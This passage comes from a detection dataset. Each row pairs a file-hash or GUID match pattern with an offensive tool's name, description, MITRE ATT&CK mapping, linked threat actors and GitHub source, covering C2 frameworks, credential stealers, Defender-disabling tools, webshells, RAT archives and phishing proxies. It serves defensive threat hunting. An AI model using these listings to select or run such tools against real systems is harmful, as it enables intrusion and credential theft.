TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42876"
"*ee604522baa122ca8384531d4d8df1014023d871f1d2fc4b53de17cc6d5d4acf*",".{0,1000}ee604522baa122ca8384531d4d8df1014023d871f1d2fc4b53de17cc6d5d4acf.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42880"
"*EE64B207-D973-489B-84A8-B718B93E039B*",".{0,1000}EE64B207\-D973\-489B\-84A8\-B718B93E039B.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42882"
"*ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b*",".{0,1000}ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42883"
"*EE666120-EE4C-4D91-A545-66BEAA1830C1*",".{0,1000}EE666120\-EE4C\-4D91\-A545\-66BEAA1830C1.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","42884"
"*ee672f25cde5ed8535ced1702d50a0fa42e229a6ee959f83c96c97b1cf0042a7*",".{0,1000}ee672f25cde5ed8535ced1702d50a0fa42e229a6ee959f83c96c97b1cf0042a7.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42885"
"*ee68d7deb7cefdfca66c078d6036d7aa3aa7afcc62b282999034b4a1faed890d*",".{0,1000}ee68d7deb7cefdfca66c078d6036d7aa3aa7afcc62b282999034b4a1faed890d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42886"
"*EE728741-4BD4-4F7C-8E41-B8328706EA84*",".{0,1000}EE728741\-4BD4\-4F7C\-8E41\-B8328706EA84.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#GUIDproject","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","42887"
"*ee7eb509d6e06bd0c51c1d0bf2a03bde2c167fb002dd6d7a842ba209f742e90e*",".{0,1000}ee7eb509d6e06bd0c51c1d0bf2a03bde2c167fb002dd6d7a842ba209f742e90e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42889"
"*ee8088715ef996a3be6d9b935086527556473825d7908573853c1ccd8aa8b26d*",".{0,1000}ee8088715ef996a3be6d9b935086527556473825d7908573853c1ccd8aa8b26d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42890"
"*ee85ccadc62f1fac243dec2da0ff38e21629cd84d56c500eab76e329cd48be61*",".{0,1000}ee85ccadc62f1fac243dec2da0ff38e21629cd84d56c500eab76e329cd48be61.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42892"
"*ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01*",".{0,1000}ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42896"
"*eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3*",".{0,1000}eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42897"
"*eead28e2afe2070b6a3f40d874c53870b13c705e90cb60520f3f52aca2ad8cf8*",".{0,1000}eead28e2afe2070b6a3f40d874c53870b13c705e90cb60520f3f52aca2ad8cf8.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42898"
"*eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427*",".{0,1000}eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42901"
"*eeba4c8ec806378fecc51fb7ffe3b48c5fa57108330b822043494cc4cea99d89*",".{0,1000}eeba4c8ec806378fecc51fb7ffe3b48c5fa57108330b822043494cc4cea99d89.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","42902"
"*EEC35BCF-E990-4260-828D-2B4F9AC97269*",".{0,1000}EEC35BCF\-E990\-4260\-828D\-2B4F9AC97269.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","#GUIDproject","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","42903"
"*EEC48565-5B42-491A-8BBB-16AC0C40C367*",".{0,1000}EEC48565\-5B42\-491A\-8BBB\-16AC0C40C367.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#GUIDproject","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","42904"
"*eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95*",".{0,1000}eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42905"
"*eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918*",".{0,1000}eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42906"
"*eed0e9350a87338b0cb8e78ea1bffc7d3c08ae221de88a3c94dc0eac0a456fe5*",".{0,1000}eed0e9350a87338b0cb8e78ea1bffc7d3c08ae221de88a3c94dc0eac0a456fe5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42907"
"*eed708f857797ce9ef61fe053a59ec41b0b96283702e5e23453c2a387c1bd8f7*",".{0,1000}eed708f857797ce9ef61fe053a59ec41b0b96283702e5e23453c2a387c1bd8f7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42908"
"*eedd5f237d110c97db52b4b3970fe3b09453120d2efcc8f6fc0291846c25edec*",".{0,1000}eedd5f237d110c97db52b4b3970fe3b09453120d2efcc8f6fc0291846c25edec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42911"
"*eee3c34bbbc0f04309c2faec56793615c2811e2ac00f6819399edd7628386411*",".{0,1000}eee3c34bbbc0f04309c2faec56793615c2811e2ac00f6819399edd7628386411.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42915"
"*eee4a896d177f5b562ac78c7e655429a1da46fb00307d9100f63d771c32297f2*",".{0,1000}eee4a896d177f5b562ac78c7e655429a1da46fb00307d9100f63d771c32297f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42916"
"*eeebce1a4c3e05e21689acef000a5fcf0f17abc3*",".{0,1000}eeebce1a4c3e05e21689acef000a5fcf0f17abc3.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","42917"
"*eef2ceac990c985faaa8e869e66e47652863bd94a14a87de4245996111717326*",".{0,1000}eef2ceac990c985faaa8e869e66e47652863bd94a14a87de4245996111717326.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","42919"
"*eeriedusk/nysm*",".{0,1000}eeriedusk\/nysm.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","42921"
"*ef012e22ef53045f48b574b395788c8639f853484bd78f4c9ad63532d916c1f9*",".{0,1000}ef012e22ef53045f48b574b395788c8639f853484bd78f4c9ad63532d916c1f9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42922"
"*ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863*",".{0,1000}ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42923"
"*ef06984084cb323bc4a055076b4817a9f69d4914707030daa0374a059e4ffe37*",".{0,1000}ef06984084cb323bc4a055076b4817a9f69d4914707030daa0374a059e4ffe37.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42924"
"*ef0a2554636103e9c7ff1590aebf1eaa2c41265092f20598e67c8ef0dd168379*",".{0,1000}ef0a2554636103e9c7ff1590aebf1eaa2c41265092f20598e67c8ef0dd168379.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42925"
"*ef105cd1be00cf14b44173895a2610f5e5ed4d06390494be20bf7175215ea851*",".{0,1000}ef105cd1be00cf14b44173895a2610f5e5ed4d06390494be20bf7175215ea851.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","42928"
"*EF143476-E53D-4C39-8DBB-A6AC7883236C*",".{0,1000}EF143476\-E53D\-4C39\-8DBB\-A6AC7883236C.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#GUIDproject","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","42931"
"*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","42932"
"*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","42933"
"*ef2eab4d2badc48463192b2eef76faf323389acd8622270e16e473a26bed88c8*",".{0,1000}ef2eab4d2badc48463192b2eef76faf323389acd8622270e16e473a26bed88c8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42937"
"*ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583*",".{0,1000}ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42938"
"*ef3a5ae6f4d510f340b4b9bce3a7aa502ffeadbf09f37dacb0c8bf00a49d36d0*",".{0,1000}ef3a5ae6f4d510f340b4b9bce3a7aa502ffeadbf09f37dacb0c8bf00a49d36d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42941"
"*ef3b03b91b7779e6ff07bacd3921a4851458c58281ac77195d3c20da19261b22*",".{0,1000}ef3b03b91b7779e6ff07bacd3921a4851458c58281ac77195d3c20da19261b22.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","42942"
"*ef3eb0e2dc2a3be441eef0bdc97eb16eb311187a6387f3e757eb0569795dcc41*",".{0,1000}ef3eb0e2dc2a3be441eef0bdc97eb16eb311187a6387f3e757eb0569795dcc41.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42945"
"*ef3fe4db61ac701cf542985aa1ad4f82efba10cafe9a9e5a1383633cac249005*",".{0,1000}ef3fe4db61ac701cf542985aa1ad4f82efba10cafe9a9e5a1383633cac249005.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42946"
"*ef573db5da42f05fee1e9ecc1d8c53690293d2053127978a092172fa9ce864f3*",".{0,1000}ef573db5da42f05fee1e9ecc1d8c53690293d2053127978a092172fa9ce864f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42949"
"*ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371*",".{0,1000}ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42950"
"*ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e*",".{0,1000}ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42951"
"*ef644b1554eb1561456e7e20b136f4fff16c3a02e821d06da3c3a6dd9aa168bc*",".{0,1000}ef644b1554eb1561456e7e20b136f4fff16c3a02e821d06da3c3a6dd9aa168bc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42952"
"*ef71783c18624e5c80cae1b445b545eefa0338e7736b0c5e9272f6dad1cb7092*",".{0,1000}ef71783c18624e5c80cae1b445b545eefa0338e7736b0c5e9272f6dad1cb7092.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42954"
"*ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff*",".{0,1000}ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","42957"
"*ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402*",".{0,1000}ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42958"
